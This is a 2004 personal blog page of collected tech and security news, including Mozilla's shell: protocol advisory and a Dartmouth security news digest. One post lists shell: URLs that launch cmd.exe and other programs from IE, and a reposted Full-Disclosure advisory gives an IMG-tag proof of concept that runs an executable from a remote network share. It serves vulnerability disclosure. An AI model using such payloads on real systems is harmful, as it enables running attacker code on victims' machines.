QODS ec

Saturday, July 10, 2004

M$: Microsoft Faces Angry IE Users' Questions

Microsoft Faces Angry IE Users' Questions

/. : Carnegie Mellon Starts Offering Courses Online

Slashdot | Carnegie Mellon Starts Offering Courses Online

Posted by michael on Saturday July 10, @07:24PM
from the gotta-start-somewhere dept.
OckNock writes "Carnegie Mellon is offering free courses through its Open Learning Initiative. Unlike MIT's OpenCourseWare which has 700 courses available, Carnegie Mellon currently only has five courses available. However, Carnegie Mellon is unique in that they offer '...courses [that] include a number of innovative online instructional components such as: cognitive tutors, virtual laboratories, group experiments, simulations,' so rather than just offering course material Carnegie Mellon is pursuing a more interactive, community approach. Carnegie Mellon is also unique in that they offer the courses as an Academic Version which '...is offered through educational institutions for credit awarded by the student's home institution.' Interestingly, The William and Flora Hewlett Foundation funds both MIT's OpenCourseWare and Carnegie Mellon's Open Learning Initiative ('Funding for the Open Learning Initiative at Carnegie Mellon has been provided by The William and Flora Hewlett Foundation.') Sadly, the courses are not supported on any open source platforms or even any open source web browsers. More importantly, I'm curious how other universities will start making their courses available freely online."

LINK: Open Learning Initiative at Carnegie Mellon University

Open Learning Initiative at Carnegie Mellon University

BOOK: Free Downloads from Bruce Perens' Open Source Series

Free Downloads from Bruce Perens' Open Source Series

OT RealPlayer released under GPL

Technocrat.net | RealPlayer released under GPL

posted by Technocrat on Sunday June 27, @10:20PM


The NY times broke this story embargoed for Monday at 8 PM Sunday night, but didn't give important details. See this story (registration required). So, before everyone gets confused: Several Linux distributions will now pick up RealPlayer because it is being released under the GPL. Real previously had their own Open Source license, but nobody wants to deal with yet another license. Most codecs are not going under GPL becuase Real does not own them, or doesn't own the technology (and has to license it). It is not clear to me at this time that the distributions picking this up will carry the non-free codecs, but most likely the software will download them on request. The "Ogg" free codecs for audio and video are definitely in there.

I think this has synergies for embedded devices such as cell phone handsets because of the tiny browser recently done by the Mozilla project with funding from Nokia.

Bruce

..

Open Clip Art Library :: openclipart.org

Open Clip Art Library :: openclipart.org

OT: Mozilla Optimization Mini-HOWTO

Mozilla Optimization Mini-HOWTO

SEC: Campaign Sites Lack Security

Wired News: Campaign Sites Lack Security

SEC: Homeland Security vulnerable to wireless hackers

CNN.com - Report: Homeland Security vulnerable to wireless hackers - Jun 30, 2004

SEC: VoIP hacks gut Caller I.D.

SecurityFocus HOME News: VoIP hacks gut Caller I.D.

VIRUS: W32/Agobot-WD

Gmail - Sophos Anti-Virus IDE alert: W32/Agobot-WD

Name: W32/Agobot-WD
Aliases: Backdoor.Agobot.gen, W32/Gaobot.worm.gen.f, Win32/Agobot.3.ABQ, W32.HLLW.Gaobot.gen, WORM_AGOBOT.WD
Type: Win32 worm
Date: 9 July 2004

A virus identity (IDE) file which provides protection is
available now from the Sophos website, and will be incorporated
into the September 2004 (3.85) release of Sophos Anti-Virus.

Customers using Enterprise Manager, PureMessage and any of the
Sophos small business solutions will be automatically protected
at their next scheduled update.

At the time of writing, Sophos has received just one report of
this worm from the wild.

Information about W32/Agobot-WD can be found at:
http://www.sophos.com/virusinfo/analyses/w32agobotwd.html

This IDE file also includes detection for:

W32/Rbot-DG
http://www.sophos.com/virusinfo/analyses/w32rbotdg.html

Download the IDE file from:
http://www.sophos.com/downloads/ide/agobotwd.ide

Download all the IDE files available for the current version of
Sophos Anti-Virus in a single compressed file. The file is
available in two formats:

Zip file:
http://www.sophos.com/downloads/ide/ides.zip

Self-extracting file:
http://www.sophos.com/downloads/ide/ides.exe

Read about how to use IDE files at
http://www.sophos.com/downloads/ide/using.html

SEC: shell: research

shell: research

I think the research over the past couple days proves that M$ just isn't
cutting it these days with their security response to vulnerabilities.
Wasn't it just the other day whn Bill Gates said that they have 1000's of
consultants ready to patch systems and it STILL takes them weeks to patch a simple hole. I understand that M$ has to deal with the underlying OS but
with that many people shouldn't they turn patches out a little faster?
I mean, come on.. I worked with the Mozilla guys and was REALLY impressed
with the turn-around on the patch. It's wasn't real elaborate to correct the issue but it was done in a matter of hours.

The shell: issue is all over Full-disclosure and slashdot but I have yet to see a public response from M$ on the issue.

I hope this helps Mozilla gain some market share because it's where browsing and security models should move in the future in my opinion-

----------end Rant---------------

M$ IE6 shell: vuln tested on fully patched XP SP1 box in VWmare lab

shell:windows\system32\calc.exe
shell:windows\system32\cmd.exe
shell:windows\system32\winver.exe
shell:windows\system32\accwiz.exe

shell:windows\system32\narrator.exe <- This is my favorite one :) This will freak someone out when the PC talks to them.

I guess the good side to this is that IS asks the user to open the file / save is clicked from an anchor but not when using the shell command.
test <- this calls cmd.exe using an anchor tag



I understand the disclosure process but what can you do if they don't respond. This isn't a canned script kiddie exploit it's research. And that should be available to anyone that is interested.

--------------

I got 99 problems but Mozilla isn't one :)

OT: Mozilla Gains on IE

PCWorld.com - Mozilla Gains on IE

SEC: Microsoft Employee Suspect in AltaVista Hacking

Microsoft Employee Suspect in AltaVista Hacking

SEC: MOZILLA: SHELL can execute remote EXE program

Gmail - [Full-Disclosure] MOZILLA: SHELL can execute remote EXE program

SUBJ: MOZILLA: SHELL can execute remote EXE program
DATE: 2004/07/09
FROM: Liu Die Yu
############################################################
[START] Advisory
############################################################

COPYRIGHT
---------
This Advisory is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )

TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709

PROCESS
-------
VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT
"shell:NETHOOD"

AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL:
shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED.

REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.

WINDOWS support "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research , and Cheng Peng Su for his
original discovery.

liudieyu

http://umbrella.name

############################################################
[START] PROOF OF CONCEPT
############################################################


[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]

SEC: What Mozilla users should know about the shell: protocol security issue

What Mozilla users should know about the shell: protocol security issue

What Mozilla users should know about the shell: protocol security issue

On July 7 a security vulnerability affecting browsers for the Windows operating system was reported to mozilla.org by Keith McCanless, and was subsequently posted to Full Disclosure, a public security mailing list. On the same day, the Mozilla security team confirmed the report of this security issue affecting the Mozilla Application Suite, Firefox, and Thunderbird and discussed and developed the fix at Bugzilla bug 250180. We have confirmed that the bug affects only users of Microsoft's Windows operating system. The issue does not affect Linux or Macintosh users.

On July 8th, the Mozilla team released a configuration change which resolves this problem by explicitly disabling the use of the shell: external protocol handler. The fix is available in two forms. The first is a small download which will make this configuration adjustment for the user. The second fix is to install the newest full release of each of these products. Instructions on administering these changes can be found below.
How to update

Mozilla, Firefox and Thunderbird users on Microsoft Windows operating systems should update in one of the following ways.

* To install the security patch for Mozilla or Firefox, follow these instructions:
1. Click Install Patch.
2. In the Software Installation window, click the "Install Now" button.
3. Exit and restart your Mozilla or Firefox browser.
* To verify the fix in your Firefox or Mozilla application, be sure to restart the browser and then follow these steps:
1. Type about:config into the address field and hit Enter.
2. In the Filter toolbar, type shell.
3. Look for the preference listing network.protocol-handler.external.shell.
4. If you see the preference listed with the value of false then your application has been patched.
* To install the security patch for Thunderbird, follow these instructions:
1. Right-click the Patch and choose save link as.
2. Save the file, shellblock.xpi, to your Desktop.
3. In Thunderbird, go to the Tools menu and select the Extensions item.
4. In the resulting Extensions window, click the "Install" button.
5. Use Windows file picker to select the shellblock.xpi file from your Desktop and click OK to dismiss the file picker.
6. Click OK on the Software Installation window.
7. Exit and restart Thunderbird.

* To download and install new Mozilla releases releases, follow the instructions below:
1. Download Mozilla 1.7.1 to your Desktop and double-click the mozilla-win32-1.7.1-installer.exe icon.
2. Follow the instructions in the Mozilla Install wizard.
1. Download Firefox 0.9.2 and to your Desktop and double-click the FirefoxSetup-0.9.2.exe icon.
2. Follow the instructions in the Firefox Install wizard.
1. Download Thunderbird 0.7.2 to your Desktop and double-click the ThunderbirdSetup-0.7.2.exe icon.
2. Follow the instructions in the Thunderbird Install wizard.

We value our users' safety and security and will continue to make all efforts to release secure products and respond quickly when security vulnerabilities are identified in our software. Future versions of Mozilla Firefox will include automatic update notifications, which will make it even easier for users to be alerted to security fixes. The Mozilla Security Team would like to thank Keith McCanless for the original bug report and test case, and apologize for incorrectly omitting mention of his report in the initial version of this document.

SEC: Security hole found in Mozilla browser

Security hole found in Mozilla browser | CNET News.com

SEC: [INFOCON] Security In The News - July 8, 2004

Gmail - [INFOCON] Security In The News - July 8, 2004

Security In The News

LAST UPDATED: 7/8/04

This report is also available on the Internet at
http://news.ists.dartmouth.edu/todaysnews.html

Terrorists Rely on Tech Tools:
PC World7/7/04

Feds Drag Feet on Cybersecurity:
PC World7/8/04

Officials bolster security, but not threat warning:
Government Executive7/8/04
Also - CNN7/8/04

HSIN starts five months early:
Federal Computer Week7/8/04

Home PCs Rented Out in Sabotage-For-Hire Racket:
Reuters7/7/04

U.S. wins appeal against alleged pirate:
C-Net News7/8/04
Also - The Register7/8/04

Spanish police: beware of lottery scam:
Computer Crime Research7/5/04

Phishing Attacks Linked To Organized Crime:
Security Pipeline7/7/04

Former Alta Vista employee arrested on hacking charges:
Duluth News Tribune (AP)7/2/04

Court refuses to lift California e-voting restrictions:
C-Net News7/7/04
Also - Computerworld7/7/04

Also - Government Computer News7/7/04

Also - The Register7/8/04

Panelists push agencies to boost funding for IT research:
Government Executive7/7/04

Lawmakers Seek to Limit States on Internet Calls:
Reuters7/7/04
Also - Siliconvalley (AP)7/7/04

Also - Wired News7/8/04

Libraries to comply with antiporn law or lose federal funding:
SearchSecurity7/8/04

Old-school worm loves Windows applications:
ZDNet News7/7/04
Also - Computer Weekly7/5/04

Password-stealing Trojan cut off at source:
ZDNet News7/7/04

Spanish Zombie PC virus author jailed:
The Register7/5/04

'Evaman virus not a major threat':
Sydney Morning Herald7/6/04
Also - ZDNet News7/5/04

Microsoft, biometrics firm to tackle homeland security:
ZDNet (Reuters)7/7/04

Lax data security seen at many Japanese companies:
Computerworld7/7/04

E-mail glitch exposes private data in California:
Computerworld7/6/04

Security Failures Threaten Online Shopping:
Channel minds7/8/04

Web app vulnerabilities on the rise:
vnunet.com7/7/04

NIST offers technical guidance for e-authentication:
Government Computer News7/6/04
Also - Federal Computer Week7/7/04

Security spending rises, as do risks:
vnunet.com7/8/04

'Phonics' Co. Settles Privacy Complaint:
Washington Post (AP)7/7/04
Also - Computerworld7/7/04

Also - MSNBC7/7/04

Postini: Half of all e-mail requests rejected:
Computerworld7/8/04

Homeland Security & Infrastructure Protection

Title: Terrorists Rely on Tech Tools
Source: PC World
Date Written: July 7, 2004
Date Collected: July 8, 2004
Speaking at the New American Foundation in Washington, DC, on July 7, 2004, Gabriel Weimann of the University of Haifa in Israel, said that terrorists are increasingly using the Internet to spread propaganda, recruit new members and raise money for future attacks. According to Mr. Weimann, the number of terrorist websites has grown by 571% since 1997, and terrorist groups such as Al Qaeda are increasingly putting training material, terrorist manuals and recruitment information online, in part to appeal to a new generation of potential terrorists. It is sometimes questioned why so few terrorist sites are taken offline - a possible answer may be that Western intelligence agencies are using the sites to gather information on terrorist plans and strategies. As terrorists' knowledge of the Internet and other technologies matures, the threat of cyberterrorism will grow.

http://www.pcworld.com/news/article/0,aid,116822,00.asp

Title: Feds Drag Feet on Cybersecurity
Source: PC World
Date Written: July 8, 2004
Date Collected: July 8, 2004
Some of the business representatives that took part in a major national effort to improve the state of cyber security are concerned that the US Department of Homeland Security (DHS) is taking too long to respond to security recommendations. In December 2003, DHS and several industry groups hosted a cyber security summit. At the summit, five task forces, comprised of representatives from industry, academia and government, were set up - the task forces issued reports with security recommendations in various areas in March 2004. However, "there has been a 'pregnant pause' waiting for a response," according to Rick White, CEO of TechNet. The task forces made numerous recommendations relating to cyber security standards and best practices, software security and security management, but DHS has, so far, failed to provide industry with security priorities or benchmarks based on the recommendations.

http://www.pcworld.com/news/article/0,aid,116818,00.asp

Title: Officials bolster security, but not threat warning
Source: Government Executive
Date Written: July 8, 2004
Date Collected: July 8, 2004
On July 7, 2004, FBI Director Robert Mueller and Homeland Security Department Undersecretary Asa Hutchinson briefed members of the US House of Representatives on current terrorist threats and ongoing security measures ahead of the political conventions in Boston at the end of July and New York City in late August and early September, 2004. Although intelligence reports indicate that terrorists continue to pose a serious threat to the US and are plotting attacks, there is currently no need to raise the terrorist threat level, according to Ms. Hutchinson. On July 8, 2004, Homeland Security Secretary Tom Ridge confirmed that Al Qaeda may be planning a "large-scale attack on the United States in an effort to disrupt the democratic process". However, he added that no specific information concerning the possible time, place or method of the attack was available.

http://www.govexec.com/story_page.cfm?articleid=28943&dcn=todaysnews
Also - http://www.cnn.com/2004/US/07/08/ridge.alqaeda/index.html

Title: HSIN starts five months early
Source: Federal Computer Week
Date Written: July 8, 2004
Date Collected: July 8, 2004
At a press conference in Washington, DC, on July 8, 2004, Homeland Security Secretary Tom Ridge announced that the Homeland Security Information Network (HSIN) is up and running five months ahead of schedule. HSIN is an unclassified network that connects the Homeland Security Operations Center with homeland security officials, law enforcement and first responders in all 50 states and major urban areas. The network will be used to distribute homeland security and terrorist information, intelligence and alerts to officials in real-time. Further, a pilot program is underway to link critical infrastructure owners and operators and other commercial entities in four cities to HSIN.

http://www.fcw.com/fcw/articles/2004/0705/web-hsin-07-08-04.asp

Cybercrime-Hacking

Title: Home PCs Rented Out in Sabotage-For-Hire Racket
Source: Reuters
Date Written: July 7, 2004
Date Collected: July 8, 2004
Police and security experts are increasingly concerned about botnets - networks of 'zombie' PCs that have been taken over by cyber attackers - that are being rented out to the highest bidder on the Internet and then being used for spamming, fraud and denial of service (DoS) attacks. According to a source in the UK's Scotland Yard computer crime unit: "Small groups of young people creating a resource out of a 10-30,000-strong computer network are renting them out to anybody who has the money." Security experts believe that teenage hackers play a leading role in setting up botnets, but criminal groups in Eastern Europe or elsewhere may be pulling the strings behind the scenes. Such botnets can be rented for anything from $100 per hour to thousands of dollars. There is little individuals or organizations can do to protect themselves against an attack form one of these massive networks of hijacked machines.

http://www.reuters.com/newsArticle.jhtml?type=internetNews&storyID=5605810

Title: U.S. wins appeal against alleged pirate
Source: C-Net News
Date Written: July 8, 2004
Date Collected: July 8, 2004
US authorities have won the latest round of the legal battle to extradite Hew Raymond Griffiths, a suspected leader of the software piracy group DrinkorDie, from Australia to face charges of conspiracy to commit criminal copyright infringement and copyright infringement in the US. Mr. Griffiths was indicted in the US in 2003, but his lawyer does not understand why he should not be tried in Australia, his country of residence. If successfully prosecuted in the US, Mr. Griffiths could face up to ten years in prison and a fine of up to $500,000, while the maximum sentence under Australian copyright laws would be five years in prison. The US Attorney's Office launched a major offensive against DrinkorDie in 2001. It alleges that the group "copied and distributed more than $50 million worth of pirated software, movies, games and music."

http://news.com.com/U.S.+wins+appeal+against+alleged+pirate/2100-1014_3-5260914.html
Also - http://www.theregister.co.uk/2004/07/08/drinkordie_suspect_remanded_again

Title: Spanish police: beware of lottery scam
Source: Computer Crime Research
Date Written: July 5, 2004
Date Collected: July 8, 2004
Spanish police are investigating a global Internet lottery scam that has conned unsuspecting victims out of thousand of euros. Authorities believe that criminal groups, most likely based in Madrid, Spain, are behind the scam. Internet users are notified that they have won a large prize in the National Spanish lottery, but are then required to pay thousands of euros in advance fees for paperwork and taxes. Not unsurprisingly, the 'winnings' are never paid out. Ki Hon Li of South Korea lost more than $50,000 in the scam.

http://www.crime-research.org/news/05.07.2004/469

Title: Phishing Attacks Linked To Organized Crime
Source: Security Pipeline
Date Written: July 7, 2004
Date Collected: July 8, 2004
US federal and state law enforcement agencies, including the Federal Bureau of Investigations (FBI) and the US Secret Service, are finding ties between online phishing scams and organized crime groups, mainly in the former Soviet bloc and Asia. Phishing scams involve sending out e-mails purporting to be from respected online businesses in an attempt to harvest personal and financial information. John Curran, supervisory special agent with the FBI's Internet Crime Complaint Center, says that while "a broad array of criminals...ranging from teenagers to grandmothers" are involved in phishing scams, organized crime groups are playing an increasing role. Such scams are facilitated by a network of hacker websites that sell phishing starter kits.

http://www.securitypipeline.com/22104197

Title: Former Alta Vista employee arrested on hacking charges
Source: Duluth News Tribune (AP)
Date Written: July 2, 2004
Date Collected: July 8, 2004
According to a statement from the US Attorney's office, 31-year old Laurent Chavet of Kirkland, Washington, was arrested in a Seattle suburb on July 2, 2004 for allegedly hacking into his ex-employer's computer network and causing damage in 2002. Mr. Chavet, who used to work for search engine company Alta Vista, has been charged with one count of unauthorized access to a protected computer and one count of reckless damage to a protected computer and, if convicted, could face up to ten years in prison and a $500,000 fine. He has been released on bail and is scheduled to be arraigned in San Francisco on July 20, 2004.

http://www.duluthsuperior.com/mld/duluthsuperior/business/9070347.htm

Politics-Legislation

Title: Court refuses to lift California e-voting restrictions
Source: C-Net News
Date Written: July 7, 2004
Date Collected: July 8, 2004
On July 6, 2004, federal judge Florence-Marie Cooper upheld an April 2004 directive by California Secretary of State Kevin Shelley that "decertified touch-screen voting machines and withheld future certification until vendors of those systems could meet specific security requirements, including voter-verifiable paper audit trails (VVPAT)." The directive had been challenged in court by four California counties (Riverside, San Bernardino, Kern and Plumas), as well as the American Association of People with Disabilities. Judge Cooper supported Mr. Shelley's decision to decertify voting machines, calling it rational and "designed to protect the voting rights of the state's citizens". Five other California counties have already reached agreement with Mr. Shelley and have had their voting machines recertified. With millions of Americans expected to cast their votes electronically in this year's presidential election, grave concerns about the security and reliability of electronic !
voting systems around the country have been raised by election officials and security experts.

http://news.com.com/Court+refuses+to+lift+California+e-voting+restrictions/2100-1028_3-5260214.html
Also - http://www.computerworld.com/governmenttopics/government/legalissues/story/0,10801,94372,00.html

Also - http://www.gcn.com/vol1_no1/daily-updates/26515-1.html

Also - http://www.theregister.co.uk/2004/07/08/getting_e-voting_security_right

Title: Panelists push agencies to boost funding for IT research
Source: Government Executive
Date Written: July 7, 2004
Date Collected: July 8, 2004
On July 7, 2004, technology and policy experts testified before a House Government Reform subcommittee on the US government's information technology (IT) research and development (R&D) efforts. According to Edward Lazowska, many major IT breakthroughs are the result of long-term government investment into basic research. However, recently, the government has not spent enough on IT R&D, especially in the area of cyber security, as evidenced by the fact that the Department of Homeland Security (DHS) is only using 2% of its $1 billion budget for R&D on cyber security to protect critical national infrastructures. However, other government entities, such as the National Institute of Standards and Technology (NIST) and the Department of Defense (DoD), are also conducting extensive IT and cyber security R&D, and the Bush administration's proposed budget for the next fiscal year allocates $2 billion for the National Coordination Office for Information Technology Research and Develop!
ment program, which coordinates R&D activities across the federal government, academia and the private sector.

http://www.govexec.com/story_page.cfm?articleid=28939&dcn=todaysnews

Title: Lawmakers Seek to Limit States on Internet Calls
Source: Reuters
Date Written: July 7, 2004
Date Collected: July 8, 2004
On July 7, 2004, lawmakers on the House Energy and Commerce Committee heard arguments for and against regulating the growing Internet telephony market and voice-over-Internet protocol (VoIP) technologies. Representatives from Internet voice providers, such as Vonage Holdings Corp., warned that a patchwork of strict state and federal regulations could be complex and could stifle innovation and growth in the industry. Republicans on the committee and at the Federal Communications Commission (FCC) appear to share the view that VoIP regulations should be light, but some Democrats believe regulations will be necessary, particularly those "which pertain to universal service, access, emergency services, law enforcement, and individuals with disabilities," according to John Dingell, the ranking Democrat on the committee. Legislation was introduced on July 6, 2004 that would classify VoIP as an interstate service, placing it under federal regulatory jurisdiction.

http://www.reuters.com/newsArticle.jhtml?type=internetNews&storyID=5611807
Also - http://www.siliconvalley.com/mld/siliconvalley/9099737.htm

Also - http://www.wired.com/news/politics/0,1283,64131,00.html

Title: Libraries to comply with antiporn law or lose federal funding
Source: SearchSecurity
Date Written: July 8, 2004
Date Collected: July 8, 2004
The Children's Internet Protection Act (CIPA) took effect on July 1, 2004. The law will force public libraries to implement Internet filtering to prevent children from viewing pornography or other harmful content on library PCs or face the loss of government technology funding in the form of E-Rate technology discounts. School administrators didn't join a legal challenge by the American Library Association against the law, so many are already adhering to the CIPA's requirements. Experience at schools, captured by a recent survey sponsored by Internet and e-mail filter maker St. Bernard Software Inc., has shown that online filters are imperfect and implementing and managing them can be costly and complicated.

http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci991888,00.html

Malware

Title: Old-school worm loves Windows applications
Source: ZDNet News
Date Written: July 7, 2004
Date Collected: July 8, 2004
Anti-virus companies have discovered three new variants of the Lovegate Internet worm (Lovgate.AD, Lovgate.AE and Lovgate.AH) this week. Like earlier versions of the worm, the new Lovegate variants spread via e-mail and network file-sharing and by exploiting an old Microsoft Windows vulnerability. The latest variants have been classified as medium risk by McAfee because they use the old, but dangerous, tactic of overwriting executable files on the local hard drive with copies of themselves. This is dangerous because it could lead to the destruction of a large number of executable files on an infected computer.

http://zdnet.com.com/2100-1105_2-5260304.html
Also - http://www.computerweekly.com/articles/article.asp?liArticleID=131726

Title: Password-stealing Trojan cut off at source
Source: ZDNet News
Date Written: July 7, 2004
Date Collected: July 8, 2004
According to security firm Symantec, the threat posed by a new password-stealing Trojan, dubbed PWSteal.Refest, has been contained by shutting down the site where stolen information was being sent. The Trojan, which was discovered last week, logged keystrokes and passwords of users of infected machines. PWSteal installed itself through a pop-up advertisement when users logged onto the websites of any one of nearly 50 financial institutions by exploiting a vulnerability in Microsoft's Internet Explorer (IE) web browser. Symantec has not received any reports of information theft from its Asian customers, according to Tim Hartman, Symantec Asia-Pacific's senior technical director.

http://news.zdnet.co.uk/0,39020330,39159780,00.htm

Title: Spanish Zombie PC virus author jailed
Source: The Register
Date Written: July 5, 2004
Date Collected: July 8, 2004
Valencia Crown Court has sentenced a Spanish man, 26-year old Óscar López Hinarejos, to two years in prison and ordered him to pay compensation to his victims for writing the Cabronator Trojan. Mr. López Hinarejos is the first virus writer to be jailed in Spain. He was arrested by the Spanish Civil Guard in April 2003. The Trojan infected 100,000 computers, turning them into 'zombies' as part of an attack network of infected PCs. Hackers also used Cabronator to collect personal information from infected machines.

http://www.theregister.co.uk/2004/07/05/spanish_vxer_jailed

Title: 'Evaman virus not a major threat'
Source: Sydney Morning Herald
Date Written: July 6, 2004
Date Collected: July 8, 2004
The Evaman Internet virus, discovered by anti-virus companies over the July 4, 2004 weekend, does not appear to be a major threat. On July 5, 2004, security firm Symantec classified Evaman as a 'category two threat' on a scale that goes up to category five for major outbreaks. The worm is spreading more slowly than had initially been expected. Evaman has been linked to the MyDoom worm that caused extensive damage and disruption in January 2004. Evaman arrives as an e-mail attachment and comes with subject headings like 'failed transaction' and 'failure delivery'. Users are urged not to open suspicious e-mail attachments and to upgrade their anti-virus software.

http://www.smh.com.au/articles/2004/07/06/1089000120633.html
Also - http://news.zdnet.co.uk/internet/0,39020369,39159581,00.htm

Technology

Title: Microsoft, biometrics firm to tackle homeland security
Source: ZDNet (Reuters)
Date Written: July 7, 2004
Date Collected: July 8, 2004
Security software firm Saflink, maker of biometric security software for fingerprint readers and other access control technologies, on July 7, 2004, announced a partnership with software giant Microsoft Corp. to develop security solutions for the US Department of Homeland Security. The idea is to combine Saflink's software with Microsoft's business software, a move that should allow Saflink to get more government contracts. Commenting on the partnership, Mark Belk, Microsoft's chief architect for homeland security software, said: "Together, we provide a compelling solution for Homeland Security programs involving biometrics, smart cards, tamper-proof identities and physical security controls."

http://zdnet.com.com/2100-1105_2-5259889.html

Vulnerabilities & Exploits

Title: Lax data security seen at many Japanese companies
Source: Computerworld
Date Written: July 7, 2004
Date Collected: July 8, 2004
A survey contained in the Japanese government's annual White Paper on Information and Communications in Japan, which was published by the Ministry of Public Management, Home Affairs, Posts and Telecommunications (MPHPT) on July 6, 2004, shows that measures taken to protect the privacy and security of personal data stored on computers are inadequate or lacking completely in many organizations. According to the survey, based on responses from about 900 companies and public organizations, almost 42% of organizations have no special technical security measures in place to protect data, while only 5% encrypt data in storage and transit and a mere 1.1% use an intrusion detection system for databases holding personal information. Results in the area of organizational security measures are equally troubling, with 37.2% of companies having no special measures in place. There have been repeated reports in recent years about large-scale data security problems at Japanese companies and !
government agencies.

http://www.computerworld.com/securitytopics/security/story/0,10801,94368,00.html

Title: E-mail glitch exposes private data in California
Source: Computerworld
Date Written: July 6, 2004
Date Collected: July 8, 2004
California's Contra Costa County is launching an investigation after it became known that hundreds of internal e-mails containing sensitive personal information about county Superior Court commissioners and other workers were sent to a Swedish company over a two-year period. The county's CIO (chief information officer) Tom Whittington says a preliminary investigations has revealed that the problem was not caused by a computer virus or another form of cyber attack, but by some county employees using erroneous e-mail address books. Although counties and cities are exempt from SB 1386, California's landmark identity-theft law, some experts believe that Contra Costa County may be required to notify those affected of the security breach.

http://computerworld.com/securitytopics/security/privacy/story/0,10801,94336,00.html

Title: Security Failures Threaten Online Shopping
Source: Channel minds
Date Written: July 8, 2004
Date Collected: July 8, 2004
A survey by LogicaCMG reveals that over one million UK consumers have experienced "an attempted or actual theft of financial or personal details" whilst carrying out online transactions, such as banking and shopping. According to the study, these security breaches have had real-world consequences for online businesses as 24% of affected consumers decided to switch to an alternative online brand, while 23% decided never to do business with the company again. It appears that online security is the most important issue for a majority of UK consumers (73%) when conducting transactions on the Internet. Companies that allow security breaches to occur could face serious revenue losses and a loss of business and reputation.

http://www.channelminds.com/article.php3?id_article=2153

Title: Web app vulnerabilities on the rise
Source: vnunet.com
Date Written: July 7, 2004
Date Collected: July 8, 2004
A study by security firm Imperva on the vulnerability of public and private web applications has found that, despite periodic penetration testing and attempts to fix vulnerabilities, 93% of web applications contain 'high' or 'critical' vulnerabilities. In many cases, new flaws are introduced while trying to close security holes after initial penetration tests have been conducted. Such application flaws leave organizations vulnerable to "web attacks, internal database breaches and worms".

http://www.vnunet.com/news/1156498

Best Practices & Risk Management

Title: NIST offers technical guidance for e-authentication
Source: Government Computer News
Date Written: July 6, 2004
Date Collected: July 8, 2004
The US National Institute of Standards and Technology (NIST) has released two new special publications dealing with information security. NIST Special Publication 800-63, 'Electronic Authentication Guideline,' released on June 30, 2004, provides technical requirements for agencies using electronic authentication based on four security levels previously defined by the Office and Management and Budget (OMB). The second document, NIST Special Publication 800-27 Revision A, 'Engineering Principles for Information Technology Security,' was released on July 2, 2004 and offers basic information on security guidelines and practices.

http://www.gcn.com/vol1_no1/daily-updates/26502-1.html
Also - http://www.fcw.com/fcw/articles/2004/0705/web-nist-07-07-04.asp

Title: Security spending rises, as do risks
Source: vnunet.com
Date Written: July 8, 2004
Date Collected: July 8, 2004
A major survey of 7,000 technology and security professionals in 40 countries, conducted by Computing and its international sister publications, shows that IT security spending is on the rise across the world, but security threats, such as computer viruses, worms and insider attacks, remain a serious worry. According to the 'Information Security Survey', 59% of North American companies and 57% of businesses in Europe will increase security spending in 2004. However, as the number and cost of cyber attacks continue to increase, security remains a major problem. The survey found that often security practices and policies are inadequate. For instance, 60% of respondents do not provide their employees with security awareness training and many do not have e-mail or web usage guidelines.

http://www.vnunet.com/news/1156507

Civil & Consumer Issues

Title: 'Phonics' Co. Settles Privacy Complaint
Source: Washington Post (AP)
Date Written: July 7, 2004
Date Collected: July 8, 2004
The US Federal Trade Commission (FTC) announced, on July 7, 2004, that it has reached a settlement with Gateway Learning Corp. of Santa Ana, California, makers of the Hooked on Phonics brand of reading instruction programs, for "alleged unfair and deceptive practices in connection with its rental of customer information to third parties". The company's privacy policy had initially promised not to disclose personal customer information to third parties, but was changed in July 2003 without notifying customers to allow for the sale of personal information to marketers. Under the settlement, Gateway Learning has agreed to pay $4,608, but did not admit to any wrongdoing. "If you collected information from customers under one policy, you can't retroactively apply a new policy to that data unless the customer agrees," said Howard Beales, director of the FTC's bureau of consumer protection.

http://www.washingtonpost.com/wp-dyn/articles/A34055-2004Jul7.html
Also - http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,94369,00.html

Also - http://www.msnbc.msn.com/id/5386195

Title: Postini: Half of all e-mail requests rejected
Source: Computerworld
Date Written: July 8, 2004
Date Collected: July 8, 2004
New figures from California-based anti-spam company Postini Inc. show that only 11% of the 10.75 billion SMTP (Simple Mail Transfer Protocol) connections the company receives each month constitute legitimate e-mail messages. Postini manages e-mail for about 3,300 companies and 5 million e-mail users worldwide. The company is dropping 53% of all e-mail connections without examining the content of messages based on analysis of the behavior of Internet-connected machines that send mail. Such 'suspicious' connections increased from 35% in October 2003 to the current level of 53%. The increase is mainly the result of increased activity from compromised home computers that are being used as spam 'zombies', according to Postini. Of the connections that are accepted, 76% of messages are spam and 1-2% contain viruses. Internet service providers, technology firms and lawmakers have recently examined a variety of legislative, policy and technological solutions to the spam epidemic and !
progress is being made in all these areas.

http://www.computerworld.com/softwaretopics/software/groupware/story/0,10801,94378,00.html

To change your delivery preferences please go to:
http://news.ists.dartmouth.edu/cgi-bin/change.cgi

If you wish to stop receiving the 'Security in the News' service please go to:
http://news.ists.dartmouth.edu/substop.html

The Institute for Security Technology Studies (ISTS) accepts no responsibility for any error or
omissions in this e-mail. The information presented is a compilation of material from various
sources and has not been verified by staff of the ISTS. Therefore, the ISTS cannot be made
responsible for the factual accuracy of the material presented. The ISTS is not liable for any loss
or damage arising from or in connection with the information contained in this report. It is the
responsibility of the user to evaluate the content and usefulness of this information. References in
this e-mail to any specific commercial products, processes, or services by trade name, trademark,
manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by
